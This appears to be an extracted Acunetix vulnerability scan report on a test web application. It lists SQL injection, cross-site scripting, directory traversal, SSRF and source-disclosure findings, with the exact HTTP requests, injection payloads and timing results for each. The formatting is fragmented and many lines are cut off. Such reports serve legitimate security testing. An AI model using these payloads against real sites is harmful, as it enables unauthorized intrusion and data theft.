Chrome/41.0.2228.0 Safari/537.21

Accept: */*

searchFor=1

/secured/newuser.php

Details

URL encoded POST input uuname was set to -1' OR 3*2*1=6 AND 000770=000770 -- Tests performed: - -1' OR 2+770-770-1=0+0+0+1 -- => TRUE- -1' OR 3+770-770-1=0+0+0+1 -- => FALSE- -1' OR 3*2<(0+5+770-770) -- => FALSE- -1' OR 3*2>(0+5+770-770) -- => FALSE- -1' OR 2+1-1-1=1 AND 000770=000770 -- => TRUE- -1' OR 000770=000770 AND ... (line truncated)

POST /secured/newuser.php HTTP/1.1

Content-Length: 231












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%40email

.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=pktdumwo&

uuname=-1'%20OR%203*2*1=6%20AND%20000770=000770%20--%20

Request headers

/sendcommand.php

Details

URL encoded POST input cart_id was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.432s- (select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6) ... (linetruncated)

POST /sendcommand.php HTTP/1.1

Content-Length: 130




Request headers










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

cart_id=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'"%

2b(select(0)from(select(sleep(0)))v)%2b"*/

/userinfo.php

Details

Cookie input login was set to test%2Ftest' AND 3*2*1=6 AND '000La9A'='000La9A Tests performed: - test%2Ftest' AND 2*3*8=6*8 AND '000La9A'='000La9A => TRUE- test%2Ftest' AND 2*3*8=6*9 AND '000La9A'='000La9A => FALSE- test%2Ftest' AND 3*3<(2*4) AND '000La9A'='000La9A => FALSE- test%2Ftest' AND 3*2>(1*5) AND '000La9A'='000La9A => TRUE- test%2Ftest' A ... (line truncated)

GET /userinfo.php HTTP/1.1

Cookie: login=test%2Ftest'%20AND%203*2*1=6%20AND%20'000La9A'='000La9A;


mc=584fcf45-4aa21-c487e-27875;









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/userinfo.php

Details

URL encoded POST input uaddress was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: -(select(0)from(select(sleep(11.422)))v)/*'+(select(0)from(select(sleep(11.422)))v)+'"+(select(0)from(select(sleep(11.422)))v)+"*/ => 20.514 s- (select(0)from(select(sleep(17.133000000000002)))v)/*'+(select(0)from(select(sleep(17.133 ... (line truncated)

POST /userinfo.php HTTP/1.1

Content-Length: 218












Chrome/41.0.2228.0 Safari/537.21

Request headers


Accept: */*

update=update&uaddress=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sle

ep(0)))v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/&ucc=1234-5678-2300-9000&uemail

=ccccc%40gmail.com&uphone=test&urname=test

/userinfo.php

Details

URL encoded POST input uaddress was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.432 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR ... (linetruncated) FROM INFORMATION_SCHEMA.TABLES


Content-Length: 226












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'

"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&ucc=1234-5678-2300-9000&uemail=ccccc@gmail

.com&uname=1&update=update&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input ucc was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>4.103 s- if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/ = ...(line truncated)


Content-Length: 252












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=if(now()

Request headers


=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sys

date()%2csleep(0)%2c0))OR"*/&uemail=ccccc%40gmail.com&uphone=test&urname=test

/userinfo.php

Details

URL encoded POST input ucc was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.495 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ = ...(line truncated)


Content-Length: 248












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=if(now()=sysdate()%2csleep(0)%2c0)/*'XOR(if(now()=sysdate(

)%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR"*/&[email protected]

m&uname=1&update=update&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uname was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/ => 3.432s- (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9))) ... (linetruncated)


Content-Length: 138








Chrome/41.0.2228.0 Safari/537.21

Accept: */*

pass=test&uname=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))

v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/

Request headers

/userinfo.php


Details

URL encoded POST input uphone was set to(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ Tests performed: - (select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/ => 9.47s- (select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3))) ... (linetruncated)


Content-Length: 265












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

update=update&uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES&ucc=1234-5678

-2300-9000&uemail=ccccc%40gmail.com&uphone=(select(0)from(select(sleep(0)))v)/*'%2b(sele

ct(0)from(select(sleep(0)))v)%2b'"%2b(select(0)from(select(sleep(0)))v)%2b"*/&urname=tes

t

Request headers

/userinfo.php

Details

URL encoded POST input urname was set toif(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/ Tests performed: - if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/ =>3.432 s- if(now()=sysdate(),sleep(0),0)/*'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"* ...(line truncated)


Content-Length: 267












Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=if(now()=sysdate()%2csleep(0)%2c0

)/*'XOR(if(now()=sysdate()%2csleep(0)%2c0))OR'"XOR(if(now()=sysdate()%2csleep(0)%2c0))OR

"*/

Request headers



HighSeverity

ValidationType

Scripting (Remote_File_Inclusion_XSS.script)Reported by module

Description

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.

Impact

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user inorder to gather data from them. An attacker can steal the session cookie and take over the account, impersonating theuser. It is also possible to modify the content of the page presented to the user.

Recommendation

Your script should filter metacharacters from user input.

References


OWASP PHP Top 5

XSS Filter Evasion Cheat Sheet

The Cross Site Scripting Faq

Acunetix Cross Site Scripting Attack

VIDEO: How Cross-Site Scripting (XSS) Works

OWASP Cross Site Scripting

How To: Prevent Cross-Site Scripting in ASP.NET

Affected items

/showimage.php

Details

URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg

GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg&size=160

HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/showimage.php

Details

URL encoded GET input file was set to http://testasp.vulnweb.com/t/xss.html?%00.jpg

GET /showimage.php?file=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg HTTP/1.1





Request headers


http://en.wikipedia.org/wiki/Cross-site_scripting


https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

http://www.cgisecurity.com/xss-faq.html

http://www.acunetix.com/websitesecurity/cross-site-scripting.htm

http://www.acunetix.com/blog/web-security-zone/video-how-cross-site-scripting-xss-works/

http://www.owasp.org/index.php/Cross_Site_Scripting

http://msdn.microsoft.com/en-us/library/ms998274.aspx





Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Cross site scripting (verified)

HighSeverity

ValidationType

Scripting (XSS_in_URI_File.script)Reported by module

Description

This script is possibly vulnerable to Cross Site Scripting (XSS) attacks. Cross site scripting (also referred to as XSS) is a vulnerability that allows an attacker to send malicious code (usually inthe form of Javascript) to another user. Because a browser cannot know if the script should be trusted or not, it willexecute the script in the user context allowing the attacker to access any cookies or session tokens retained by thebrowser.

Impact


Recommendation


References







OWASP PHP Top 5


Affected items

/404.php

Details

URI was set to 1<ScRiPt>42kR(9973)</ScRiPt>The input is reflected inside a text element.

GET /404.php?1<ScRiPt>42kR(9973)</ScRiPt> HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/AJAX/showxml.php

Details

Cookie input mycookie was set to 3'"()&%<acx><ScRiPt >1saf(9039)</ScRiPt>

GET /AJAX/showxml.php HTTP/1.1




Request headers










e08WSaKYCDF56qlApubsVlhj2DGEJCwKRb1bzpA66k-q7zHVDUKrHvoMGvXVLF0D-aw8uJk;

mycookie=3'"()&%<acx><ScRiPt%20>1saf(9039)</ScRiPt>






Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/comment.php

Details

URL encoded POST input name was set to <your%20name%20here>'"()&%<acx><ScRiPt >AAIu(9657)</ScRiPt>

POST /comment.php HTTP/1.1

Content-Length: 134











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Submit=Submit&comment=1&name=<your%2520name%2520here>'"()%26%25<acx><ScRiPt%20>AAIu(9657

)</ScRiPt>&phpaction=echo%20%24_POST[comment];

Request headers

/guestbook.php

Details

URL encoded POST input name was set to 1'"()&%<acx><ScRiPt >ipR3(9455)</ScRiPt>

POST /guestbook.php HTTP/1.1

Content-Length: 58











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

name=1'"()%26%25<acx><ScRiPt%20>ipR3(9455)</ScRiPt>&text=1

Request headers

/guestbook.php

Details

URL encoded POST input name was set to test'"()&%<acx><ScRiPt >qM7p(9301)</ScRiPt>


Content-Length: 82






Request headers







Chrome/41.0.2228.0 Safari/537.21

Accept: */*

submit=add%20message&name=test'"()%26%25<acx><ScRiPt%20>qM7p(9301)</ScRiPt>&text=1

/guestbook.php

Details

URL encoded POST input text was set to 1'"()&%<acx><ScRiPt >qM7p(9520)</ScRiPt>


Content-Length: 82











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

submit=add%20message&name=test&text=1'"()%26%25<acx><ScRiPt%20>qM7p(9520)</ScRiPt>

Request headers

/guestbook.php

Details

URL encoded POST input text was set to 1'"()&%<acx><ScRiPt >ipR3(9803)</ScRiPt>


Content-Length: 58











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

name=1&text=1'"()%26%25<acx><ScRiPt%20>ipR3(9803)</ScRiPt>

Request headers

/hpp/

Details

URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >Prtb(9620)</ScRiPt>

GET /hpp/?pp=12'"()%26%25<acx><ScRiPt%20>Prtb(9620)</ScRiPt> HTTP/1.1








Request headers




Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/hpp/index.php

Details

URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >4gFH(9455)</ScRiPt>

GET /hpp/index.php?pp=12'"()%26%25<acx><ScRiPt%20>4gFH(9455)</ScRiPt> HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/hpp/params.php

Details

URL encoded GET input p was set to 1'"()&%<acx><ScRiPt >uOEX(9270)</ScRiPt>

GET /hpp/params.php?aaaa=&p=1'"()%26%25<acx><ScRiPt%20>uOEX(9270)</ScRiPt>&pp=1 HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/hpp/params.php

Details

URL encoded GET input p was set to valid'"()&%<acx><ScRiPt >pQkA(9519)</ScRiPt>

GET /hpp/params.php?p=valid'"()%26%25<acx><ScRiPt%20>pQkA(9519)</ScRiPt>&pp=12 HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/hpp/params.php

Details

URL encoded GET input pp was set to 1'"()&%<acx><ScRiPt >uOEX(9244)</ScRiPt>

GET /hpp/params.php?aaaa=&p=1&pp=1'"()%26%25<acx><ScRiPt%20>uOEX(9244)</ScRiPt> HTTP/1.1



Request headers









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

/hpp/params.php

Details

URL encoded GET input pp was set to 12'"()&%<acx><ScRiPt >pQkA(9834)</ScRiPt>

GET /hpp/params.php?p=valid&pp=12'"()%26%25<acx><ScRiPt%20>pQkA(9834)</ScRiPt> HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php

Details

URL encoded GET input artist was set to 3'"()&%<acx><ScRiPt >XjrD(9481)</ScRiPt>

GET /listproducts.php?artist=3'"()%26%25<acx><ScRiPt%20>XjrD(9481)</ScRiPt> HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php

Details

URL encoded GET input cat was set to 1'"()&%<acx><ScRiPt >8irV(9253)</ScRiPt>

GET /listproducts.php?artist=1&cat=1'"()%26%25<acx><ScRiPt%20>8irV(9253)</ScRiPt>

HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/listproducts.php


Details

URL encoded GET input cat was set to 4'"()&%<acx><ScRiPt >H9gs(9842)</ScRiPt>

GET /listproducts.php?cat=4'"()%26%25<acx><ScRiPt%20>H9gs(9842)</ScRiPt> HTTP/1.1










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/search.php

Details

URL encoded POST input searchFor was set to the'"()&%<acx><ScRiPt >3nrK(9234)</ScRiPt>


Content-Length: 70











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

goButton=go&searchFor=the'"()%26%25<acx><ScRiPt%20>3nrK(9234)</ScRiPt>

Request headers

/search.php

Details

URL encoded POST input searchFor was set to 1'"()&%<acx><ScRiPt >1hct(9548)</ScRiPt>


Content-Length: 56











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

searchFor=1'"()%26%25<acx><ScRiPt%20>1hct(9548)</ScRiPt>

Request headers


Details

URL encoded POST input uaddress was set to 3137%20Laguna%20Street'"()&%<acx><ScRiPt >tsOc(9895)</ScRiPt>


Content-Length: 240

Request headers












Chrome/41.0.2228.0 Safari/537.21

Accept: */*

signup=signup&uaddress=3137%2520Laguna%2520Street'"()%26%25<acx><ScRiPt%20>tsOc(9895)</S

cRiPt>&ucc=4111111111111111&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00d

Pa%24%24w0rD&uphone=555-666-0606&urname=gdbgngto&uuname=gdbgngto


Details

URL encoded POST input ucc was set to 4111111111111111'"()&%<acx><ScRiPt >tsOc(9901)</ScRiPt>


Content-Length: 236











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111'"()%26%25<acx><ScRiPt

%20>tsOc(9901)</ScRiPt>&uemail=sample%40email.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%2

4%24w0rD&uphone=555-666-0606&urname=mwhnckff&uuname=mwhnckff

Request headers


Details

URL encoded POST input uemail was set to sample%40email.tst'"()&%<acx><ScRiPt >tsOc(9674)</ScRiPt>


Content-Length: 238











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

signup=signup&uaddress=3137%20Laguna%20Street&ucc=4111111111111111&uemail=sample%2540ema

il.tst'"()%26%25<acx><ScRiPt%20>tsOc(9674)</ScRiPt>&upass=g00dPa%24%24w0rD&upass2=g00dPa

%24%24w0rD&uphone=555-666-0606&urname=oujmfbim&uuname=oujmfbim

Request headers



Details

URL encoded POST input uphone was set to 555-666-0606'"()&%<acx><ScRiPt >tsOc(9182)</ScRiPt>


Content-Length: 236











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606'"()%26%25<acx><S

cRiPt%20>tsOc(9182)</ScRiPt>&urname=fkwnuyex&uuname=fkwnuyex

Request headers


Details

URL encoded POST input urname was set to fkwnuyex'"()&%<acx><ScRiPt >tsOc(9996)</ScRiPt>


Content-Length: 236











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=fkwnuyex'

"()%26%25<acx><ScRiPt%20>tsOc(9996)</ScRiPt>&uuname=pgcxsuui

Request headers


Details

URL encoded POST input uuname was set to pgcxsuui'"()&%<acx><ScRiPt >tsOc(9290)</ScRiPt>


Content-Length: 236











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers



.tst&upass=g00dPa%24%24w0rD&upass2=g00dPa%24%24w0rD&uphone=555-666-0606&urname=unwljifb&

uuname=pgcxsuui'"()%26%25<acx><ScRiPt%20>tsOc(9290)</ScRiPt>

/userinfo.php

Details

URL encoded POST input uaddress was set toSELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES'"()&%<acx><ScRiPt >fIR5(9325)</ScRiPt>


Content-Length: 202











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

update=update&uaddress=SELECT%2520*%250d%250a%2520FROM%2520INFORMATION_SCHEMA.TABLES'"()

%26%25<acx><ScRiPt%20>fIR5(9325)</ScRiPt>&ucc=1234-5678-2300-9000&uemail=ccccc%40gmail.c

om&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uaddress was set to SELECT * FROMINFORMATION_SCHEMA.TABLES'"()&%<acx><ScRiPt >rFLf(9636)</ScRiPt>


Content-Length: 198











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT%20*%0d%0a%20FROM%20INFORMATION_SCHEMA.TABLES'"()%26%25<acx><ScRiPt%20>rF

Lf(9636)</ScRiPt>&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=update&u

phone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input ucc was set to 1234-5678-2300-9000'"()&%<acx><ScRiPt >rFLf(9972)</ScRiPt>


Content-Length: 188







Request headers






Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000'"()%26%25<acx><ScRiPt%20>rFLf(9972)</S

cRiPt>&[email protected]&uname=1&update=update&uphone=test&urname=test

/userinfo.php

Details

URL encoded POST input ucc was set to 1234-5678-2300-9000'"()&%<acx><ScRiPt >fIR5(9760)</ScRiPt>


Content-Length: 192











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000'"()%26%25<acx><ScRiPt%20>fIR5(9760)</ScRiPt>&uemail=ccccc%40gmail.com&uphone=

test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uemail was set to [email protected]'"()&%<acx><ScRiPt >rFLf(9503)</ScRiPt>


Content-Length: 190











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&uemail=ccccc%40gmail.com'"()%26%25<acx

><ScRiPt%20>rFLf(9503)</ScRiPt>&uname=1&update=update&uphone=test&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uemail was set to ccccc%40gmail.com'"()&%<acx><ScRiPt >fIR5(9131)</ScRiPt>


Request headers


Content-Length: 194











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%2540gmail.com'"()%26%25<acx><ScRiPt%20>fIR5(9131)</ScRiPt>&uphon

e=test&urname=test

/userinfo.php

Details

URL encoded POST input uphone was set to test'"()&%<acx><ScRiPt >rFLf(9677)</ScRiPt>


Content-Length: 188











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM

INFORMATION_SCHEMA.TABLES&ucc=1234-5678-2300-9000&[email protected]&uname=1&update=

update&uphone=test'"()%26%25<acx><ScRiPt%20>rFLf(9677)</ScRiPt>&urname=test

Request headers

/userinfo.php

Details

URL encoded POST input uphone was set to test'"()&%<acx><ScRiPt >fIR5(9389)</ScRiPt>


Content-Length: 192











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%40gmail.com&uphone=test'"()%26%25<acx><ScRiPt%20>fIR5(9389)</ScR

iPt>&urname=test

Request headers


/userinfo.php

Details

URL encoded POST input urname was set to test'"()&%<acx><ScRiPt >rFLf(9321)</ScRiPt>


Content-Length: 188











Chrome/41.0.2228.0 Safari/537.21

Accept: */*

uaddress=SELECT *

FROM


update&uphone=test&urname=test'"()%26%25<acx><ScRiPt%20>rFLf(9321)</ScRiPt>

Request headers

/userinfo.php

Details

URL encoded POST input urname was set to test'"()&%<acx><ScRiPt >fIR5(9535)</ScRiPt>


Content-Length: 192











Chrome/41.0.2228.0 Safari/537.21

Accept: */*


-2300-9000&uemail=ccccc%40gmail.com&uphone=test&urname=test'"()%26%25<acx><ScRiPt%20>fIR

5(9535)</ScRiPt>

Request headers


Directory traversal (verified)

HighSeverity

ValidationType

Scripting (Directory_Traversal.script)Reported by module

Description

This script is possibly vulnerable to directory traversal attacks. Directory Traversal is a vulnerability which allows attackers to access restricted directories and execute commandsoutside of the web server's root directory.

Impact

By exploiting directory traversal vulnerabilities, attackers step out of the root directory and access files in otherdirectories. As a result, attackers might view restricted files or execute commands, leading to a full compromise of theWeb server.

Recommendation


References

Acunetix Directory Traversal Attacks

Affected items

/showimage.php

Details

URL encoded GET input file was set to 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILEAdditional details: Source file: /hj/var/www//showimage.php line: 19 File: 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILE.tn "fopen" was called.

GET /showimage.php?file=1ACUSTARTFILE/../../xxx%5c..%5c..%5cACUENDFILE&size=160 HTTP/1.1

Acunetix-Aspect-Password: *****

Acunetix-Aspect: enabled










Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/showimage.php

Details

URL encoded GET input file was set to 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILEAdditional details: Source file: /hj/var/www//showimage.php line: 7 File: 1ACUSTARTFILE/../../xxx\..\..\ACUENDFILE "fopen" was called.

GET /showimage.php?file=1ACUSTARTFILE/../../xxx%5c..%5c..%5cACUENDFILE HTTP/1.1




Request headers


http://www.acunetix.com/websitesecurity/directory-traversal/









Chrome/41.0.2228.0 Safari/537.21

Accept: */*


Macromedia Dreamweaver remote database scripts

HighSeverity

ConfigurationType

Scripting (Dreamweaver_Scripts.script)Reported by module

Description

Macromedia Dreamweaver has created a directory (_mmServerScripts or _mmDBScripts) that contains scripts fortesting database connectivity. One of these scripts (mmhttpdb.php or mmhttpdb.asp) can be accessed without user ID orpassword and contains numerous operations, such as listing Datasource Names or executing arbitrary SQL queries.

Impact

It is possible to execute arbitrary SQL queries and list datasource names.

Recommendation

Remove these directories from production systems.

References

NGSSoftware advisory

CVE-2004-1893

Affected items

/

Details

Macromedia Dreamweaver scripts found at : //_mmServerScripts/MMHTTPDB.php

GET //_mmServerScripts/MMHTTPDB.php HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.net-security.org/vuln.php?id=3376

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1893

nginx SPDY heap buffer overflow

HighSeverity

ConfigurationType

Scripting (Version_Check.script)Reported by module

Description

A heap-based buffer overflow in the SPDY implementation in nginx 1.3.15 before 1.4.7 and 1.5.x before 1.5.12 allowsremote attackers to execute arbitrary code via a crafted request. The problem affects nginx compiled with thengx_http_spdy_module module (which is not compiled by default) and without --with-debug configure option, if the "spdy"option of the "listen" directive is used in a configuration file.

Impact

An attacker can cause a heap memory buffer overflow in a worker process by using a specially crafted request,potentially resulting in arbitrary code execution

Recommendation

Upgrade nginx to the latest version of apply the patch provided by the vendor.

References

nginx security advisory (CVE-2014-0133)

nginx patch

CVE-2014-0133

Affected items

Web Server

Details

Current version is : nginx/1.4.1


http://mailman.nginx.org/pipermail/nginx-announce/2014/000135.html

http://nginx.org/download/patch.2014.spdy2.txt

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0133


HighSeverity

ConfigurationType

Reported by module

Description

The PHP configuration directive allow_url_fopen is enabled. When enabled, this directive allows data retrieval fromremote locations (web site or FTP server). A large number of code injection vulnerabilities reported in PHP-based webapplications are caused by the combination of enabling allow_url_fopen and bad input filtering. allow_url_fopen is enabled by default.

Impact

Application dependant - possible remote file inclusion.

Recommendation

You can disable allow_url_fopen from php.ini or .htaccess. php.iniallow_url_fopen = 'off' .htaccessphp_flag allow_url_fopen off

Affected items

Web Server

Details

Current setting is : allow_url_fopen = On


Script source code disclosure

HighSeverity

ValidationType

Scripting (Script_Source_Code_Disclosure.script)Reported by module

Description

It is possible to read the source code of this script by using script filename as a parameter. It seems that this scriptincludes a file which name is determined using user-supplied data. This data is not properly validated before beingpassed to the include function.

Impact

An attacker can gather sensitive information (database connection strings, application logic) by analyzing the sourcecode. This information can be used to launch further attacks.

Recommendation

Analyze the source code of this script and solve the problem.

References

Source Code Disclosure

Affected items

/showimage.php

Details

URL encoded GET input file was set to showimage.phpSource disclosure pattern found: <?php// header("Content-Length: 1" /*. filesize($name)*/);if( isset($_GET["file"]) && !isset($_GET["size"]) ){ // open the file in a binary mode header("Content-Type: image/jpeg"); $name = $_GET["file"]; $fp = fopen($name, 'rb'); // send the right headers header("Content-Type: image/jpeg"); // dump the picture and stop the script fpassthru($fp); exit;}elseif (isset($_GET["file"]) && isset($_GET["size"])){ header("Content-Type: image/jpeg"); $name = $_GET["file"]; $fp ...

GET /showimage.php?file=showimage.php HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers


http://www.imperva.com/resources/glossary?term=source_code_disclosure

Server side request forgery

HighSeverity

ConfigurationType

Scripting (Server_Side_Request_Forgery.script)Reported by module

Description

SSRF as in Server Side Request Forgery is a vulnerability that allows an attacker to force server interfaces into sendingpackets initiated by the victim server to the local interface or to another server behind the firewall. Consult WebReferences for more information about this problem.

Impact

The impact varies according to the affected server interface.

Recommendation

Your script should properly sanitize user input.

References

SSRF VS. BUSINESS-CRITICAL APPLICATIONS

Affected items

/showimage.php

Details

URL encoded GET input file was set to http://hitMlz50kp76Z.bxss.me/ An HTTP request was initiated for the domain hitMlz50kp76Z.bxss.me which indicates that this script is vulnerable toSSRF (Server Side Request Forgery). HTTP request details: IP address: 176.28.50.165User agent:

GET /showimage.php?file=http://hitMlz50kp76Z.bxss.me/ HTTP/1.1









Chrome/41.0.2228.0 Safari/537.21

Accept: */*

Request headers

/showimage.php

Details

URL encoded GET input file was set to http://hitkqJ3bxpRTL.bxss.me/ An HTTP request was initiated for the domain hitkqJ3bxpRTL.bxss.me which indicates that this script is vulnerable toSSRF (Server Side Request Forgery). HTTP request details: IP address: 176.28.50.165User agent:

GET /showimage.php?file=http://hitkqJ3bxpRTL.bxss.me/&size=160 HTTP/1.1






Request headers


https://media.blackhat.com/bh-us-12/Briefings/Polyakov/BH_US_12_Polyakov_SSRF_Business_Slides.pdf




Chrome/41.0.2228.0 Safari/537.21

Accept: */*


SQL injection

